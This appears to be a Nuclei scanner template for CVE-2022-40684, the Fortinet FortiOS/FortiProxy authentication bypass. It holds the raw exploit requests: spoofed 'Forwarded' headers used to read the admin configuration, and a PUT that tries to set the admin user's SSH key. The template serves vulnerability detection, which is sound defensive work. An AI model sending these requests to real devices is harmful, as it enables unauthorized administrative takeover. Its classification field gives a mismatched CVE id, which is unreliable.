nuclei-templates/cves/2022/CVE-2022-40684.yaml

57 lines
1.8 KiB
YAML

id: CVE-2022-40684
info:
name: Fortigate - Authentication bypass
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Enables an unauthenticated remote attacker to use administrative interfaces by sending specially crafted HTTP or HTTPS requests, allowing them to log in to various products of Fortinet that are unpatched.
reference:
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
classification:
cvss-score: 9.6
cve-id: CVE-2022-27593
tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev
requests:
- raw:
- |
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Node.js
Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
X-Forwarded-Vdom: root
- |
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1":"{{randstr}}"
}
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: word
part: body_1
words:
- "ENC XXXX"
- "http_method"
condition: and
- type: word
part: body_2
words:
- 'Invalid SSH public key.'
- 'cli_error'
condition: and